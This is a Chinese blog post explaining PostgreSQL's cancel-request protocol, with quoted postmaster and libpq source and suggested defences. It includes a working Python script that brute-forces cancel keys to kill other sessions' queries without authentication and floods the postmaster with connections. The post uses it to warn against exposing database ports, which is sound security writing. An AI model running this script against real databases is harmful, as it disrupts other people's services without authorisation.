PostgreSQL cancel 通信协议、信号和代码

9 minute read

背景

数据库端口暴露有什么风险么？

你可能会觉得，只要密码足够复杂，或者你设置了pg_hba.conf，数据库端口暴露也没有风险。

可是实际上是这样的吗？我们的小鲜肉来告诉你风险在哪。

我们来看个例子：

目前这个数据库只允许unix socket连接，但是监听了所有端口。

你觉得这样的pg_hba.conf配置安全么？

postgres@digoal-> psql  
psql (9.4.4)  
Type "help" for help.  
postgres=# \q  
  
postgres@digoal-> psql -h 127.0.0.1  
psql: SSL error: sslv3 alert handshake failure  
FATAL:  no pg_hba.conf entry for host "127.0.0.1", user "postgres", database "postgres", SSL off  

我们在这个数据库上运行一个LONG SQL。

postgres=# select pg_backend_pid();  
 pg_backend_pid   
----------------  
          61758  
(1 row)  
postgres=# select pg_sleep(10000);  

然后编写一个脚本，目的是通过TCP发cancel请求给postmaster，让postmaster去处理cancel请求。

需要告诉postmaster两个值，PID和PID对应的 cancel_key。

[root@digoal ~]# vi cancel.py   
#!/usr/bin/python  
import struct  
import socket  
import sys  
  
def pg_cancel_query(pid, cancel_key):  
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
    s.connect(("127.0.0.1",1921))  
    buffer = struct.pack('IIII', socket.htonl(16), socket.htonl((1234<<16)|(5678)),\  
            socket.htonl(int(pid)), socket.htonl(int(cancel_key)))  
    s.send(buffer)  
    # log.info("cancel query %s: return %s" % (query, s.recv(1024)))  
    s.close()   
  
for i in xrange(1,2147483647):  
  pg_cancel_query(int(sys.argv[1]),i)  

执行，

[root@digoal ~]# ./cancel.py 61758

你的这个LONG SQL语句可能会被CANCEL掉。

ERROR:  canceling statement due to user request

而在你的日志中可能会有大量的这样的报错

2015-09-29 14:22:41.767 CST,,,61756,"127.0.0.1:28378",560a2e31.cc83,2,"",2015-09-29 14:22:41 CST,,0,LOG,00000,"wrong key in cancel request for process 61758",,,,,,,,"processCancelRequest, postmaster.c:2126",""  

也就是说，外界在没有密码的情况下，可以把你的SQL CANCEL掉。只要他尝试正确了你的PID和这个PID对应的cancel_key。

现在知道危险了吧。不要没事把数据库端口暴露出来，破解密码是一种威胁，另一种威胁就是前面举的例子。

分析一下：

PostgreSQL为每个backend pid存储了一个cancel_key，这个KEY是一个随机long值。

src/backend/postmaster/postmaster.c

/*  
 * List of active backends (or child processes anyway; we don't actually  
 * know whether a given child has become a backend or is still in the  
 * authorization phase).  This is used mainly to keep track of how many  
 * children we have and send them appropriate signals when necessary.  
 *  
 * "Special" children such as the startup, bgwriter and autovacuum launcher  
 * tasks are not in this list.  Autovacuum worker and walsender are in it.  
 * Also, "dead_end" children are in it: these are children launched just for  
 * the purpose of sending a friendly rejection message to a would-be client.  
 * We must track them because they are attached to shared memory, but we know  
 * they will never become live backends.  dead_end children are not assigned a  
 * PMChildSlot.  
 *  
 * Background workers that request shared memory access during registration are  
 * in this list, too.  
 */  
typedef struct bkend  
{  
        pid_t           pid;                    /* process id of backend */  
        long            cancel_key;             /* cancel key for cancels for this backend */  就是他  
        int                     child_slot;             /* PMChildSlot for this backend, if any */  
  
        /*  
         * Flavor of backend or auxiliary process.  Note that BACKEND_TYPE_WALSND  
         * backends initially announce themselves as BACKEND_TYPE_NORMAL, so if  
         * bkend_type is normal, you should check for a recent transition.  
         */  
        int                     bkend_type;  
        bool            dead_end;               /* is it going to send an error and quit? */  
        bool            bgworker_notify;        /* gets bgworker start/stop notifications */  
        dlist_node      elem;                   /* list link in BackendList */  
} Backend;  

处理startup包，如果是cancel包，则交给processCancelRequest处理。

/*  
 * Read a client's startup packet and do something according to it.  
 *  
 * Returns STATUS_OK or STATUS_ERROR, or might call ereport(FATAL) and  
 * not return at all.  
 *  
 * (Note that ereport(FATAL) stuff is sent to the client, so only use it  
 * if that's what you want.  Return STATUS_ERROR if you don't want to  
 * send anything to the client, which would typically be appropriate  
 * if we detect a communications failure.)  
 */  
static int  
ProcessStartupPacket(Port *port, bool SSLdone)  
{  
......  
        /*  
         * Allocate at least the size of an old-style startup packet, plus one  
         * extra byte, and make sure all are zeroes.  This ensures we will have  
         * null termination of all strings, in both fixed- and variable-length  
         * packet layouts.  
         */  
        if (len <= (int32) sizeof(StartupPacket))  
                buf = palloc0(sizeof(StartupPacket) + 1);  
        else  
                buf = palloc0(len + 1);  
......  
        /*  
         * The first field is either a protocol version number or a special  
         * request code.  
         */  
        port->proto = proto = ntohl(*((ProtocolVersion *) buf));  
  
        if (proto == CANCEL_REQUEST_CODE)  
        {  
                processCancelRequest(port, buf);  
                /* Not really an error, but we don't want to proceed further */  
                return STATUS_ERROR;  
        }  
......  

postmaster处理cancel请求时，需比对PID和对应的cancel key。

/*  
 * The client has sent a cancel request packet, not a normal  
 * start-a-new-connection packet.  Perform the necessary processing.  
 * Nothing is sent back to the client.  
 */  
static void  
processCancelRequest(Port *port, void *pkt)  
{  
        CancelRequestPacket *canc = (CancelRequestPacket *) pkt;  
        int                     backendPID;  
        long            cancelAuthCode;  
        Backend    *bp;  
  
#ifndef EXEC_BACKEND  
        dlist_iter      iter;  
#else  
        int                     i;  
#endif  
  
        backendPID = (int) ntohl(canc->backendPID);  
        cancelAuthCode = (long) ntohl(canc->cancelAuthCode);  
  
        /*  
         * See if we have a matching backend.  In the EXEC_BACKEND case, we can no  
         * longer access the postmaster's own backend list, and must rely on the  
         * duplicate array in shared memory.  
         */  
#ifndef EXEC_BACKEND  
        dlist_foreach(iter, &BackendList)  
        {  
                bp = dlist_container(Backend, elem, iter.cur);  
#else  
        for (i = MaxLivePostmasterChildren() - 1; i >= 0; i--)  
        {  
                bp = (Backend *) &ShmemBackendArray[i];  
#endif  
                if (bp->pid == backendPID)  // 比对backend process 的PID  
                {  
                        if (bp->cancel_key == cancelAuthCode)  //  比对backend process 对应的cancel_key  
                        {  
                                /* Found a match; signal that backend to cancel current op */  
                                ereport(DEBUG2,  
                                                (errmsg_internal("processing cancel request: sending SIGINT to process %d",  
                                                                                 backendPID)));  
                                signal_child(bp->pid, SIGINT);  // 发cancel信号  
                        }  
                        else  
                                /* Right PID, wrong key: no way, Jose */  
                                ereport(LOG,  
                                                (errmsg("wrong key in cancel request for process %d",  
                                                                backendPID)));  
                        return;  
                }  
        }  
        /* No matching backend */  
        ereport(LOG,  
                        (errmsg("PID %d in cancel request did not match any process",  
                                        backendPID)));  
}  

流程：

PostmasterMain  
ServerLoop  
BackendStartup  
fork_process  
BackendInitialize  
ProcessStartupPacket  
processCancelRequest  

演示：

vi src/backend/postmaster/postmaster.c  
  
static int  
BackendStartup(Port *port)  
{  
        // MyCancelKey = PostmasterRandom();  // 注释掉随机码，  
        MyCancelKey = (long) 100;  // 使用一个固定值，方便演示  
        bn->cancel_key = MyCancelKey;  
......  
make && make install  
pg_ctl restart -m fast  
  
[root@digoal ~]# vi cancel.py   
#!/usr/bin/python  
import struct  
import socket  
import sys  
  
def pg_cancel_query(pid, cancel_key):  
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
    s.connect(("127.0.0.1",1921))  
    buffer = struct.pack('IIII', socket.htonl(16), socket.htonl((1234<<16)|(5678)),\  
            socket.htonl(int(pid)), socket.htonl(int(cancel_key)))  
    s.send(buffer)  
    # log.info("cancel query %s: return %s" % (query, s.recv(1024)))  
    s.close()   
  
pg_cancel_query(int(sys.argv[1]),100)  

现在你可以随意的cancel了。

postgres=# select pg_backend_pid();  
 pg_backend_pid   
----------------  
          63988  
(1 row)  
  
postgres=# select pg_sleep(10000);  
  
[root@digoal ~]# ./cancel.py 63988  
  
ERROR:  canceling statement due to user request  

风险在哪里

1. cancel 请求。

2. 即使你不知道PID和cancel key也会造成主节点不断的fork process，创建socket。

防范

1. 不要暴露端口，通过防火墙来阻挡。

2. 如果要暴露，请设置白名单。

3. 从源码层加固，但是需要注意psql, 以及其他周边软件可能也是这么来cancel query的。

所以改动可以考虑从pg_hba.conf入手，必须符合pg_hba.conf的规则才允许cancel请求。

如果改动了的话，可能造成不兼容。

如psql

src/bin/psql/common.c

static BOOL WINAPI  
consoleHandler(DWORD dwCtrlType)  
{  
        char            errbuf[256];  
  
        if (dwCtrlType == CTRL_C_EVENT ||  
                dwCtrlType == CTRL_BREAK_EVENT)  
        {  
                /*  
                 * Can't longjmp here, because we are in wrong thread :-(  
                 */  
  
                /* set cancel flag to stop any long-running loops */  
                cancel_pressed = true;  
  
                /* and send QueryCancel if we are processing a database query */  
                EnterCriticalSection(&cancelConnLock);  
                if (cancelConn != NULL)  
                {  
                        if (PQcancel(cancelConn, errbuf, sizeof(errbuf)))  
                                write_stderr("Cancel request sent\n");  
                        else  
                        {  
                                write_stderr("Could not send cancel request: ");  
                                write_stderr(errbuf);  
                        }  
                }  
                LeaveCriticalSection(&cancelConnLock);  
  
                return TRUE;  
        }  
        else  
                /* Return FALSE for any signals not being handled */  
                return FALSE;  
}  

src/interfaces/libpq/fe-connect.c

/*  
 * PQcancel and PQrequestCancel: attempt to request cancellation of the  
 * current operation.  
 *  
 * The return value is TRUE if the cancel request was successfully  
 * dispatched, FALSE if not (in which case an error message is available).  
 * Note: successful dispatch is no guarantee that there will be any effect at  
 * the backend.  The application must read the operation result as usual.  
 *  
 * CAUTION: we want this routine to be safely callable from a signal handler  
 * (for example, an application might want to call it in a SIGINT handler).  
 * This means we cannot use any C library routine that might be non-reentrant.  
 * malloc/free are often non-reentrant, and anything that might call them is  
 * just as dangerous.  We avoid sprintf here for that reason.  Building up  
 * error messages with strcpy/strcat is tedious but should be quite safe.  
 * We also save/restore errno in case the signal handler support doesn't.  
 *  
 * internal_cancel() is an internal helper function to make code-sharing  
 * between the two versions of the cancel function possible.  
 */  
static int  
internal_cancel(SockAddr *raddr, int be_pid, int be_key,  
                                char *errbuf, int errbufsize)  
{  
        int                     save_errno = SOCK_ERRNO;  
        pgsocket        tmpsock = PGINVALID_SOCKET;  
        char            sebuf[256];  
        int                     maxlen;  
        struct  
        {  
                uint32          packetlen;  
                CancelRequestPacket cp;  
        }                       crp;  
  
        /*  
         * We need to open a temporary connection to the postmaster. Do this with  
         * only kernel calls.  
         */  
        if ((tmpsock = socket(raddr->addr.ss_family, SOCK_STREAM, 0)) == PGINVALID_SOCKET)  
        {  
                strlcpy(errbuf, "PQcancel() -- socket() failed: ", errbufsize);  
                goto cancel_errReturn;  
        }  
retry3:  
        if (connect(tmpsock, (struct sockaddr *) & raddr->addr,  
                                raddr->salen) < 0)  
        {  
                if (SOCK_ERRNO == EINTR)  
                        /* Interrupted system call - we'll just try again */  
                        goto retry3;  
                strlcpy(errbuf, "PQcancel() -- connect() failed: ", errbufsize);  
                goto cancel_errReturn;  
        }  
  
        /*  
         * We needn't set nonblocking I/O or NODELAY options here.  
         */  
  
        /* Create and send the cancel request packet. */  
  
        crp.packetlen = htonl((uint32) sizeof(crp));  
        crp.cp.cancelRequestCode = (MsgType) htonl(CANCEL_REQUEST_CODE);  
        crp.cp.backendPID = htonl(be_pid);  
        crp.cp.cancelAuthCode = htonl(be_key);  
  
retry4:  
        if (send(tmpsock, (char *) &crp, sizeof(crp), 0) != (int) sizeof(crp))  
        {  
                if (SOCK_ERRNO == EINTR)  
                        /* Interrupted system call - we'll just try again */  
                        goto retry4;  
                strlcpy(errbuf, "PQcancel() -- send() failed: ", errbufsize);  
                goto cancel_errReturn;  
        }  
  
        /*  
         * Wait for the postmaster to close the connection, which indicates that  
         * it's processed the request.  Without this delay, we might issue another  
         * command only to find that our cancel zaps that command instead of the  
         * one we thought we were canceling.  Note we don't actually expect this  
         * read to obtain any data, we are just waiting for EOF to be signaled.  
         */  
retry5:  
        if (recv(tmpsock, (char *) &crp, 1, 0) < 0)  
        {  
                if (SOCK_ERRNO == EINTR)  
                        /* Interrupted system call - we'll just try again */  
                        goto retry5;  
                /* we ignore other error conditions */  
        }  
  
        /* All done */  
        closesocket(tmpsock);  
        SOCK_ERRNO_SET(save_errno);  
        return TRUE;  
  
cancel_errReturn:  
  
        /*  
         * Make sure we don't overflow the error buffer. Leave space for the \n at  
         * the end, and for the terminating zero.  
         */  
        maxlen = errbufsize - strlen(errbuf) - 2;  
        if (maxlen >= 0)  
        {  
                strncat(errbuf, SOCK_STRERROR(SOCK_ERRNO, sebuf, sizeof(sebuf)),  
                                maxlen);  
                strcat(errbuf, "\n");  
        }  
        if (tmpsock != PGINVALID_SOCKET)  
                closesocket(tmpsock);  
        SOCK_ERRNO_SET(save_errno);  
        return FALSE;  
}  

判断连接数是否超出，给系统释放sock预留了一些，所以是两倍的(连接数+worker processes+1)。

/*  
 * MaxLivePostmasterChildren  
 *  
 * This reports the number of entries needed in per-child-process arrays  
 * (the PMChildFlags array, and if EXEC_BACKEND the ShmemBackendArray).  
 * These arrays include regular backends, autovac workers, walsenders  
 * and background workers, but not special children nor dead_end children.  
 * This allows the arrays to have a fixed maximum size, to wit the same  
 * too-many-children limit enforced by canAcceptConnections().  The exact value  
 * isn't too critical as long as it's more than MaxBackends.  
 */  
int  
MaxLivePostmasterChildren(void)  
{  
        return 2 * (MaxConnections + autovacuum_max_workers + 1 +  
                                max_worker_processes);  
}  

是否允许连接

static CAC_state  
canAcceptConnections(void)  
{  
        CAC_state       result = CAC_OK;  
  
        /*  
         * Can't start backends when in startup/shutdown/inconsistent recovery  
         * state.  
         *  
         * In state PM_WAIT_BACKUP only superusers can connect (this must be  
         * allowed so that a superuser can end online backup mode); we return  
         * CAC_WAITBACKUP code to indicate that this must be checked later. Note  
         * that neither CAC_OK nor CAC_WAITBACKUP can safely be returned until we  
         * have checked for too many children.  
         */  
        if (pmState != PM_RUN)  
        {  
                if (pmState == PM_WAIT_BACKUP)  
                        result = CAC_WAITBACKUP;        /* allow superusers only */  
                else if (Shutdown > NoShutdown)  
                        return CAC_SHUTDOWN;    /* shutdown is pending */  
                else if (!FatalError &&  
                                 (pmState == PM_STARTUP ||  
                                  pmState == PM_RECOVERY))  
                        return CAC_STARTUP; /* normal startup */  
                else if (!FatalError &&  
                                 pmState == PM_HOT_STANDBY)  
                        result = CAC_OK;        /* connection OK during hot standby */  
                else  
                        return CAC_RECOVERY;    /* else must be crash recovery */  
        }  
  
        /*  
         * Don't start too many children.  
         *  
         * We allow more connections than we can have backends here because some  
         * might still be authenticating; they might fail auth, or some existing  
         * backend might exit before the auth cycle is completed. The exact  
         * MaxBackends limit is enforced when a new backend tries to join the  
         * shared-inval backend array.  
         *  
         * The limit here must match the sizes of the per-child-process arrays;  
         * see comments for MaxLivePostmasterChildren().  
         */  
        if (CountChildren(BACKEND_TYPE_ALL) >= MaxLivePostmasterChildren())  
                result = CAC_TOOMANY;  
  
        return result;  
}  

digoal’s 大量PostgreSQL文章入口

Twitter Facebook Google+ LinkedIn

Digoal.zhou

PostgreSQL cancel 通信协议、信号和代码

背景

风险在哪里

防范

digoal’s 大量PostgreSQL文章入口

You May Also Enjoy

PostgreSQL(PPAS 兼容Oracle) 从零开始入门手册 - 珍藏版

PostgreSQL pipelinedb 流计算插件 - IoT应用 - 实时轨迹聚合

PostgreSQL plpgsql 存储过程、函数 - 状态、异常变量打印、异常捕获… - GET [STACKED] DIAGNOSTICS

PostgreSQL datediff 日期间隔（单位转换）兼容SQL用法